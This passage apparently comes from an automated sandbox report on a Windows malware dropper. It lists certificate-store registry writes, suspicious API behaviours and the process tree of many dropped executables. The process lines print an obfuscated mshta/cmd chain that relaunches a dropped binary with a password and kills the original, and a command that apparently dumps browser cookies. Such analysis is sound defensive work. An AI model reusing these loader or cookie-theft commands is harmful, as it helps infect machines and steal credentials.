b5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 | C:\Users\Admin\AppData\Local\Temp\is-JH53N.tmp\Setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 | C:\Users\Admin\AppData\Local\Temp\is-JH53N.tmp\Setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f | C:\Users\Admin\AppData\Local\Temp\is-MTSN4.tmp\Setup.tmp | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Intel Rapid\IntelRapid.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup (3).exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup (3).exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\HqkHqVVv_6si5R2VVL2MfxxR.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\HqkHqVVv_6si5R2VVL2MfxxR.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\HqkHqVVv_6si5R2VVL2MfxxR.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\VysNse9aH2S6vEZG4VFDtDI3.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious behavior: SetClipboardViewer
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\2602399.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\6541000.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\K2aSBFrA_cHuoOf_8ZtXSMc_.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\vZSIKgTjqziPEz0JWLcpqXp4.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\GNDvt5g3HxmYCmFACtCcclmN.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\7795918.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\3tJDOLvW9JdZRHySiCJwFYGT.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\pRjxtUH4Y1sdrK20hogdP64C.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\4603920.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Setup (3).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (3).exe"
C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv 8PFJ7Xr/RkiQhw851r/usQ.0.2
C:\Users\Admin\Documents\Ph7SKqZGOIgshC61JNpbCxN5.exe
"C:\Users\Admin\Documents\Ph7SKqZGOIgshC61JNpbCxN5.exe"
C:\Users\Admin\Documents\9eAwJOPrFXjx72bkI5bRJ2WU.exe
"C:\Users\Admin\Documents\9eAwJOPrFXjx72bkI5bRJ2WU.exe"
C:\Users\Admin\Documents\WTQvm11a9eyMEXiXLw7QhwZ0.exe
"C:\Users\Admin\Documents\WTQvm11a9eyMEXiXLw7QhwZ0.exe"
C:\Users\Admin\Documents\KKr9W_cK7QZHQT49ljSOp7ep.exe
"C:\Users\Admin\Documents\KKr9W_cK7QZHQT49ljSOp7ep.exe"
C:\Users\Admin\Documents\dHTmi4R61qkMbVF29eS0KvSM.exe
"C:\Users\Admin\Documents\dHTmi4R61qkMbVF29eS0KvSM.exe"
C:\Users\Admin\Documents\3tJDOLvW9JdZRHySiCJwFYGT.exe
"C:\Users\Admin\Documents\3tJDOLvW9JdZRHySiCJwFYGT.exe"
C:\Users\Admin\Documents\K2aSBFrA_cHuoOf_8ZtXSMc_.exe
"C:\Users\Admin\Documents\K2aSBFrA_cHuoOf_8ZtXSMc_.exe"
C:\Users\Admin\Documents\tagR_GHtIRsJS5siarvoMNbq.exe
"C:\Users\Admin\Documents\tagR_GHtIRsJS5siarvoMNbq.exe"
C:\Users\Admin\Documents\vZSIKgTjqziPEz0JWLcpqXp4.exe
"C:\Users\Admin\Documents\vZSIKgTjqziPEz0JWLcpqXp4.exe"
C:\Users\Admin\Documents\CKtgFsvgxGFhRN5JLRlsBLTG.exe
"C:\Users\Admin\Documents\CKtgFsvgxGFhRN5JLRlsBLTG.exe"
C:\Users\Admin\Documents\Fe6dg4sTI4b3YuqL8xbjBfod.exe
"C:\Users\Admin\Documents\Fe6dg4sTI4b3YuqL8xbjBfod.exe"
C:\Users\Admin\Documents\lIkD5YTQEsXHxwXNGoW9X06y.exe
"C:\Users\Admin\Documents\lIkD5YTQEsXHxwXNGoW9X06y.exe"
C:\Users\Admin\Documents\DwFDoL5gj07oZ0kG90UFr1Mz.exe
"C:\Users\Admin\Documents\DwFDoL5gj07oZ0kG90UFr1Mz.exe"
C:\Users\Admin\Documents\pRjxtUH4Y1sdrK20hogdP64C.exe
"C:\Users\Admin\Documents\pRjxtUH4Y1sdrK20hogdP64C.exe"
C:\Users\Admin\Documents\SFy6g7Ex4EqD3t2BISAbhuWh.exe
"C:\Users\Admin\Documents\SFy6g7Ex4EqD3t2BISAbhuWh.exe"
C:\Users\Admin\Documents\nX1qQN8UEVNWIggeh_vV_Cmx.exe
"C:\Users\Admin\Documents\nX1qQN8UEVNWIggeh_vV_Cmx.exe"
C:\Users\Admin\Documents\Cb70gVclk30wGCXDIzC7MEwD.exe
"C:\Users\Admin\Documents\Cb70gVclk30wGCXDIzC7MEwD.exe"
C:\Users\Admin\Documents\Ig_d14eGdwervmy7DFofIV9O.exe
"C:\Users\Admin\Documents\Ig_d14eGdwervmy7DFofIV9O.exe"
C:\Users\Admin\Documents\HqkHqVVv_6si5R2VVL2MfxxR.exe
"C:\Users\Admin\Documents\HqkHqVVv_6si5R2VVL2MfxxR.exe"
C:\Users\Admin\Documents\GNDvt5g3HxmYCmFACtCcclmN.exe
"C:\Users\Admin\Documents\GNDvt5g3HxmYCmFACtCcclmN.exe"
C:\Users\Admin\Documents\XdSH7DWXqp6yaXqcW2MnJi9V.exe
"C:\Users\Admin\Documents\XdSH7DWXqp6yaXqcW2MnJi9V.exe"
C:\Users\Admin\Documents\epSY5JonORm5zUOCET_ffnPB.exe
"C:\Users\Admin\Documents\epSY5JonORm5zUOCET_ffnPB.exe"
C:\Users\Admin\Documents\MqRxC7m72g9jwwE2lRN_IiU7.exe
"C:\Users\Admin\Documents\MqRxC7m72g9jwwE2lRN_IiU7.exe"
C:\Users\Admin\Documents\hpnp_a0lhFfP7su9EKSuw_w9.exe
"C:\Users\Admin\Documents\hpnp_a0lhFfP7su9EKSuw_w9.exe"
C:\Users\Admin\Documents\Zz8mo11wpMCaGr79RLEk4vPq.exe
"C:\Users\Admin\Documents\Zz8mo11wpMCaGr79RLEk4vPq.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\MqRxC7m72g9jwwE2lRN_IiU7.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\MqRxC7m72g9jwwE2lRN_IiU7.exe"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )
C:\Program Files (x86)\Company\NewProduct\jooyu.exe
"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1944 -ip 1944
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\MqRxC7m72g9jwwE2lRN_IiU7.exe" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" =="" for %A In ("C:\Users\Admin\Documents\MqRxC7m72g9jwwE2lRN_IiU7.exe" ) do taskkill -f -iM "%~NxA"
C:\Program Files (x86)\Company\NewProduct\customer3.exe
"C:\Program Files (x86)\Company\NewProduct\customer3.exe"
C:\Users\Admin\Documents\DwFDoL5gj07oZ0kG90UFr1Mz.exe
C:\Users\Admin\Documents\DwFDoL5gj07oZ0kG90UFr1Mz.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1944 -s 316
C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE
hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS
C:\Users\Admin\Documents\Fe6dg4sTI4b3YuqL8xbjBfod.exe
C:\Users\Admin\Documents\Fe6dg4sTI4b3YuqL8xbjBfod.exe
C:\Users\Admin\Documents\XdSH7DWXqp6yaXqcW2MnJi9V.exe
C:\Users\Admin\Documents\XdSH7DWXqp6yaXqcW2MnJi9V.exe
C:\Users\Admin\Documents\WTQvm11a9eyMEXiXLw7QhwZ0.exe
"C:\Users\Admin\Documents\WTQvm11a9eyMEXiXLw7QhwZ0.exe" -q
C:\Users\Admin\Documents\pHDW1j1IeTZHDMBxJLx7Jz7d.exe
"C:\Users\Admin\Documents\pHDW1j1IeTZHDMBxJLx7Jz7d.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill -f -iM "MqRxC7m72g9jwwE2lRN_IiU7.exe"
C:\Users\Admin\Documents\DwFDoL5gj07oZ0kG90UFr1Mz.exe
C:\Users\Admin\Documents\DwFDoL5gj07oZ0kG90UFr1Mz.exe
C:\Users\Admin\AppData\Local\Temp\is-O15JS.tmp\pHDW1j1IeTZHDMBxJLx7Jz7d.tmp
"C:\Users\Admin\AppData\Local\Temp\is-O15JS.tmp\pHDW1j1IeTZHDMBxJLx7Jz7d.tmp" /SL5="$40204,138429,56832,C:\Users\Admin\Documents\pHDW1j1IeTZHDMBxJLx7Jz7d.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1632 -ip 1632
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2360 -ip 2360
C:\Users\Admin\Documents\HqkHqVVv_6si5R2VVL2MfxxR.exe
"C:\Users\Admin\Documents\HqkHqVVv_6si5R2VVL2MfxxR.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 1064 -ip 1064
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2360 -s 280
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 2188 -ip 2188
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 1276 -ip 1276
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 1556 -ip 1556
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 720 -p 2376 -ip 2376
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 744 -p 1100 -ip 1100
